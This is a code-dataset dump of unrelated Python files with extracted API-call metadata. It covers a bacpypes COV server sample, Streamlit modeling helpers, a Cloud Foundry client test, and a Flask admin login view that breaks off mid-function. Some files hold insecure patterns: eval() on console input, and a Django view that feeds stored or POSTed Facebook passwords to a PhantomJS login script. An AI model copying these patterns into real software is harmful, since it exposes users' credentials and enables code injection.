| [((10, 4, 10, 31), 'streamlit.subheader', 'st.subheader', ({(10, 17, 10, 30): '"""Proportions"""'}, {}), "('Proportions')", True, 'import streamlit as st\n'), ((11, 4, 11, 47), 'streamlit.sidebar.subheader', 'st.sidebar.subheader', ({(11, 25, 11, 46): '"""Proportion Settings"""'}, {}), "('Proportion Settings')", True, 'import streamlit as st\n'), ((12, 18, 12, 75), 'streamlit.sidebar.radio', 'st.sidebar.radio', ({(12, 35, 12, 37): '""""""', (12, 38, 12, 74): "['One Proportion', 'Two Proportions']"}, {}), "('', ['One Proportion', 'Two Proportions'])", True, 'import streamlit as st\n'), ((15, 19, 15, 32), 'streamlit.columns', 'st.columns', ({(15, 30, 15, 31): '3'}, {}), '(3)', True, 'import streamlit as st\n'), ((26, 14, 26, 27), 'streamlit.columns', 'st.columns', ({(26, 25, 26, 26): '1'}, {}), '(1)', True, 'import streamlit as st\n'), ((71, 19, 71, 32), 'streamlit.columns', 'st.columns', ({(71, 30, 71, 31): '3'}, {}), '(3)', True, 'import streamlit as st\n'), ((84, 14, 84, 27), 'streamlit.columns', 'st.columns', ({(84, 25, 84, 26): '1'}, {}), '(1)', True, 'import streamlit as st\n'), ((23, 12, 23, 39), 'streamlit.markdown', 'st.markdown', ({(23, 24, 23, 38): '"""Pick a test:"""'}, {}), "('Pick a test:')", True, 'import streamlit as st\n'), ((24, 26, 24, 77), 'streamlit.radio', 'st.radio', ({(24, 35, 24, 37): '""""""', (24, 38, 24, 76): "['Left Tail', 'Two Tails', 'Right Tail']"}, {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])", True, 'import streamlit as st\n'), ((29, 18, 29, 46), 'math.sqrt', 'math.sqrt', ({(29, 28, 29, 45): 'nullp * (1 - nullp) / n'}, {}), '(nullp * (1 - nullp) / n)', False, 'import math\n'), ((30, 19, 30, 47), 'math.sqrt', 'math.sqrt', ({(30, 29, 30, 46): 'p_hat * (1 - p_hat) / n'}, {}), '(p_hat * (1 - p_hat) / n)', False, 'import math\n'), ((32, 16, 32, 34), 'numpy.arange', 'np.arange', ({(32, 26, 32, 28): '-4', (32, 29, 32, 30): '4', (32, 31, 32, 33): '0.1'}, {}), '(-4, 4, 0.1)', True, 'import numpy as np\n'), ((34, 18, 34, 45), 'pandas.DataFrame', 'pd.DataFrame', ({(34, 31, 34, 44): "{'x': x, 'y': y}"}, {}), "({'x': x, 'y': y})", True, 'import pandas as pd\n'), ((61, 19, 61, 143), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((62, 12, 62, 26), 'streamlit.write', 'st.write', ({(62, 21, 62, 25): 'data'}, {}), '(data)', True, 'import streamlit as st\n'), ((81, 12, 81, 39), 'streamlit.markdown', 'st.markdown', ({(81, 24, 81, 38): '"""Pick a test:"""'}, {}), "('Pick a test:')", True, 'import streamlit as st\n'), ((82, 26, 82, 77), 'streamlit.radio', 'st.radio', ({(82, 35, 82, 37): '""""""', (82, 38, 82, 76): "['Left Tail', 'Two Tails', 'Right Tail']"}, {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])", True, 'import streamlit as st\n'), ((93, 18, 93, 54), 'math.sqrt', 'math.sqrt', ({(93, 28, 93, 53): 'pp_hat * pq_hat * (1 / n1 + 1 / n2)'}, {}), '(pp_hat * pq_hat * (1 / n1 + 1 / n2))', False, 'import math\n'), ((94, 19, 94, 63), 'math.sqrt', 'math.sqrt', ({(94, 29, 94, 62): 'p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2'}, {}), '(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)', False, 'import math\n'), ((97, 16, 97, 34), 'numpy.arange', 'np.arange', ({(97, 26, 97, 28): '-4', (97, 29, 97, 30): '4', (97, 31, 97, 33): '0.1'}, {}), '(-4, 4, 0.1)', True, 'import numpy as np\n'), ((99, 18, 99, 45), 'pandas.DataFrame', 'pd.DataFrame', ({(99, 31, 99, 44): "{'x': x, 'y': y}"}, {}), "({'x': x, 'y': y})", True, 'import pandas as pd\n'), ((127, 19, 127, 205), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((128, 12, 128, 26), 'streamlit.write', 'st.write', ({(128, 21, 128, 25): 'data'}, {}), '(data)', True, 'import streamlit as st\n'), ((17, 20, 17, 44), 'streamlit.text_input', 'st.text_input', ({(17, 34, 17, 40): '"""Hits"""', (17, 41, 17, 43): '20'}, {}), "('Hits', 20)", True, 'import streamlit as st\n'), ((18, 20, 18, 45), 'streamlit.text_input', 'st.text_input', ({(18, 34, 18, 41): '"""Tries"""', (18, 42, 18, 44): '25'}, {}), "('Tries', 25)", True, 'import streamlit as st\n'), ((20, 26, 20, 51), 'streamlit.text_input', 'st.text_input', ({(20, 40, 20, 47): '"""Null:"""', (20, 48, 20, 50): '0.7'}, {}), "('Null:', 0.7)", True, 'import streamlit as st\n'), ((21, 26, 21, 52), 'streamlit.text_input', 'st.text_input', ({(21, 40, 21, 47): '"""Alpha"""', (21, 48, 21, 51): '0.05'}, {}), "('Alpha', 0.05)", True, 'import streamlit as st\n'), ((73, 21, 73, 47), 'streamlit.text_input', 'st.text_input', ({(73, 35, 73, 43): '"""Hits 1"""', (73, 44, 73, 46): '20'}, {}), "('Hits 1', 20)", True, 'import streamlit as st\n'), ((74, 21, 74, 48), 'streamlit.text_input', 'st.text_input', ({(74, 35, 74, 44): '"""Tries 1"""', (74, 45, 74, 47): '25'}, {}), "('Tries 1', 25)", True, 'import streamlit as st\n'), ((77, 21, 77, 47), 'streamlit.text_input', 'st.text_input', ({(77, 35, 77, 43): '"""Hits 2"""', (77, 44, 77, 46): '30'}, {}), "('Hits 2', 30)", True, 'import streamlit as st\n'), ((78, 21, 78, 48), 'streamlit.text_input', 'st.text_input', ({(78, 35, 78, 44): '"""Tries 2"""', (78, 45, 78, 47): '50'}, {}), "('Tries 2', 50)", True, 'import streamlit as st\n'), ((80, 26, 80, 52), 'streamlit.text_input', 'st.text_input', ({(80, 40, 80, 47): '"""Alpha"""', (80, 48, 80, 51): '0.05'}, {}), "('Alpha', 0.05)", True, 'import streamlit as st\n')] |
subhash12/cf-python-client | integration/v2/test_service_instances.py | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| [((6, 10, 6, 37), 'logging.getLogger', 'logging.getLogger', ({(6, 28, 6, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((11, 17, 11, 50), 'config_test.build_client_from_configuration', 'build_client_from_configuration', ({}, {}), '()', False, 'from config_test import build_client_from_configuration\n'), ((20, 17, 20, 50), 'config_test.build_client_from_configuration', 'build_client_from_configuration', ({}, {}), '()', False, 'from config_test import build_client_from_configuration\n')] |
troyready/runway | runway/core/providers/__init__.py | 4fd299961a4b73df39e14f4f19a7236f7be17dd8 | """Runway providers."""
| [] |
noelli/bacpypes | samples/COVServer.py | c2f4d753ed86bc0357823e718e7ff16c05f06850 | #!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| [((332, 13, 332, 54), 'bacpypes.consolelogging.ConfigArgumentParser', 'ConfigArgumentParser', (), '', False, 'from bacpypes.consolelogging import ConfigArgumentParser\n'), ((368, 18, 368, 49), 'bacpypes.local.device.LocalDeviceObject', 'LocalDeviceObject', (), '', False, 'from bacpypes.local.device import LocalDeviceObject\n'), ((375, 14, 381, 9), 'bacpypes.object.AnalogValueObject', 'AnalogValueObject', (), '', False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((389, 14, 394, 9), 'bacpypes.object.BinaryValueObject', 'BinaryValueObject', (), '', False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((430, 4, 430, 18), 'bacpypes.core.run', 'run', ({(430, 8, 430, 17): 'args.spin'}, {}), '(args.spin)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((200, 8, 200, 53), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', ({(200, 31, 200, 35): 'self', (200, 37, 200, 52): '(interval * 1000)'}, {}), '(self, interval * 1000)', False, 'from bacpypes.task import RecurringTask\n'), ((229, 8, 229, 29), 'threading.Thread.__init__', 'Thread.__init__', ({(229, 24, 229, 28): 'self'}, {}), '(self)', False, 'from threading import Thread\n'), ((268, 8, 268, 53), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', ({(268, 31, 268, 35): 'self', (268, 37, 268, 52): '(interval * 1000)'}, {}), '(self, interval * 1000)', False, 'from bacpypes.task import RecurringTask\n'), ((300, 8, 300, 29), 'threading.Thread.__init__', 'Thread.__init__', ({(300, 24, 300, 28): 'self'}, {}), '(self)', False, 'from threading import Thread\n'), ((406, 8, 406, 25), 'bacpypes.core.enable_sleeping', 'enable_sleeping', ({}, {}), '()', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((416, 8, 416, 38), 'bacpypes.core.deferred', 'deferred', ({(416, 17, 416, 37): 'test_av_thread.start'}, {}), '(test_av_thread.start)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((426, 8, 426, 38), 'bacpypes.core.deferred', 'deferred', ({(426, 17, 426, 37): 'test_bv_thread.start'}, {}), '(test_bv_thread.start)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((254, 12, 254, 37), 'time.sleep', 'time.sleep', ({(254, 23, 254, 36): 'self.interval'}, {}), '(self.interval)', False, 'import time\n'), ((325, 12, 325, 37), 'time.sleep', 'time.sleep', ({(325, 23, 325, 36): 'self.interval'}, {}), '(self.interval)', False, 'import time\n')] |
theopak/glassface | server/glassface/facebookfriender/views.py | bcb6c02636bda069d604a4da1dd09222e99be356 | import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
def add(request, friend):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js')
try:
subprocess.call([phantomjs, script, friend, request.user.get_profile().facebook_email, request.user.get_profile().facebook_pass])
except:
return False
return True
def extract(request):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js')
print "sexy"
out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']])
print out
return "user id goes here"
| [] |
rubyruins/fancylit | fancylit/modeling/yellowbrick_funcs.py | 56a7cdfe78edd687a3b318bbbfa534203de1ace8 | import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
train_features - train set feautres
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
# find all bad rows
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
except :
st.warning("Verify the type of problem that you select")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer) | [((28, 20, 28, 68), 'streamlit.selectbox', 'st.selectbox', ({(28, 33, 28, 55): '"""Select Target Column"""', (28, 57, 28, 67): 'df.columns'}, {}), "('Select Target Column', df.columns)", True, 'import streamlit as st\n'), ((29, 13, 29, 40), 'numpy.array', 'np.array', ({(29, 22, 29, 39): 'df[target_string]'}, {}), '(df[target_string])', True, 'import numpy as np\n'), ((32, 19, 32, 73), 'streamlit.multiselect', 'st.multiselect', ({(32, 34, 32, 60): '"""Select Modeling Features"""', (32, 62, 32, 72): 'df.columns'}, {}), "('Select Modeling Features', df.columns)", True, 'import streamlit as st\n'), ((36, 18, 36, 36), 'numpy.array', 'np.array', ({(36, 27, 36, 35): 'features'}, {}), '(features)', True, 'import numpy as np\n'), ((49, 18, 49, 33), 'numpy.array', 'np.array', ({(49, 27, 49, 32): 'feats'}, {}), '(feats)', True, 'import numpy as np\n'), ((52, 14, 52, 36), 'random.randint', 'random.randint', ({(52, 29, 52, 30): '1', (52, 32, 52, 35): '200'}, {}), '(1, 200)', False, 'import random\n'), ((59, 8, 59, 83), 'sklearn.model_selection.train_test_split', 'train_test_split', (), '', False, 'from sklearn.model_selection import train_test_split\n'), ((89, 7, 89, 31), 'streamlit.button', 'st.button', ({(89, 17, 89, 30): '"""Train Model"""'}, {}), "('Train Model')", True, 'import streamlit as st\n'), ((127, 20, 128, 69), 'streamlit.selectbox', 'st.selectbox', (), '', True, 'import streamlit as st\n'), ((130, 19, 132, 60), 'streamlit.multiselect', 'st.multiselect', (), '', True, 'import streamlit as st\n'), ((170, 4, 170, 30), 'streamlit_yellowbrick.st_yellowbrick', 'st_yellowbrick', ({(170, 19, 170, 29): 'visualizer'}, {}), '(visualizer)', False, 'from streamlit_yellowbrick import st_yellowbrick\n'), ((91, 8, 91, 42), 'streamlit.header', 'st.header', ({(91, 18, 91, 41): '"""Classification Report"""'}, {}), "('Classification Report')", True, 'import streamlit as st\n'), ((93, 8, 95, 9), 'streamlit.markdown', 'st.markdown', ({(94, 12, 94, 389): '"""The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."""'}, {}), "(\n 'The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports.'\n )", True, 'import streamlit as st\n'), ((113, 8, 113, 21), 'streamlit.write', 'st.write', ({(113, 17, 113, 20): 'fig'}, {}), '(fig)', True, 'import streamlit as st\n'), ((137, 23, 138, 70), 'streamlit.selectbox', 'st.selectbox', ({(137, 36, 137, 64): '"""Select the type of problem"""', (138, 37, 138, 69): "['classification', 'regression']"}, {}), "('Select the type of problem', ['classification', 'regression'])", True, 'import streamlit as st\n'), ((147, 14, 149, 42), 'yellowbrick.target.FeatureCorrelation', 'FeatureCorrelation', (), '', False, 'from yellowbrick.target import FeatureCorrelation\n'), ((151, 14, 151, 81), 'plotly.express.bar', 'px.bar', (), '', True, 'import plotly.express as px\n'), ((152, 8, 152, 28), 'streamlit.plotly_chart', 'st.plotly_chart', ({(152, 24, 152, 27): 'fig'}, {}), '(fig)', True, 'import streamlit as st\n'), ((99, 12, 99, 24), 'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ({}, {}), '()', False, 'from sklearn.naive_bayes import GaussianNB\n'), ((141, 21, 142, 72), 'streamlit.selectbox', 'st.selectbox', ({(141, 34, 141, 65): '"""Select the correlation method"""', (142, 30, 142, 71): "['mutual_info-classification', 'pearson']"}, {}), "('Select the correlation method', ['mutual_info-classification',\n 'pearson'])", True, 'import streamlit as st\n'), ((144, 21, 145, 70), 'streamlit.selectbox', 'st.selectbox', ({(144, 34, 144, 65): '"""Select the correlation method"""', (145, 32, 145, 69): "['mutual_info-regression', 'pearson']"}, {}), "('Select the correlation method', ['mutual_info-regression',\n 'pearson'])", True, 'import streamlit as st\n'), ((155, 8, 155, 64), 'streamlit.warning', 'st.warning', ({(155, 19, 155, 63): '"""Verify the type of problem that you select"""'}, {}), "('Verify the type of problem that you select')", True, 'import streamlit as st\n'), ((45, 12, 45, 27), 'streamlit.error', 'st.error', ({(45, 21, 45, 26): 'error'}, {}), '(error)', True, 'import streamlit as st\n'), ((46, 12, 46, 29), 'streamlit.error', 'st.error', ({(46, 21, 46, 28): 'featarr'}, {}), '(featarr)', True, 'import streamlit as st\n'), ((47, 12, 47, 21), 'streamlit.stop', 'st.stop', ({}, {}), '()', True, 'import streamlit as st\n')] |
moonbria/test1 | info/modules/admin/views.py | 05893bd91d416ca4093e4619ede427434fa665cc | from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
@admin_blu.route("/login", methods=["GET", "POST"])
def admin_login():
if request.method == "GET":
# 去session 中取到指定的值
user_id = session.get("user_id", None)
is_admin = session.get("is_admin", False)
if user_id and is_admin:
return redirect(url_for("admin_index"))
return render_template("admin/login.html")
# 取到登陆的参数
username = request.form.get("username")
password = request.form.get("password")
if not all([username, password]):
return render_template("admin/login.html", errmsg="参数错误")
try:
user = User.query.filter(User.mobile == username).first()
except Exception as e:
current_app.logger.error(e)
return render_template("admin/login.html", errmsg="数据错误")
if not user:
return render_template("admin/login.html", errmsg="用户名错误")
if not user.check_password(password):
return render_template("admin/login.html", errmsg="密码错误")
if not user.is_admin:
return render_template("admin/login.html", errmsg="用户不是管理员")
session["user_id"] = user.id
session["nick_name"] = user.nick_name
session["mobile"] = user.mobile
session["is_admin"] = True
# 跳转到后台管理主页,暂未实现
return redirect(url_for("admin.admin_index"))
@admin_blu.route("/index")
@user_login_data
def admin_index():
user = g.user
return render_template("admin/index.html", user=user.to_dict())
@admin_blu.before_request
def before_request():
# 判断如果不是登陆页面的请求
if not request.url.endswith(url_for("admin.admin_login")):
user_id = session.get("user_id")
is_admin = session.get("is_admin", False)
if not user_id or not is_admin:
# 判断当前是否有用户登陆,或者是否是管理员,如果不是,直接重定向到项目首页
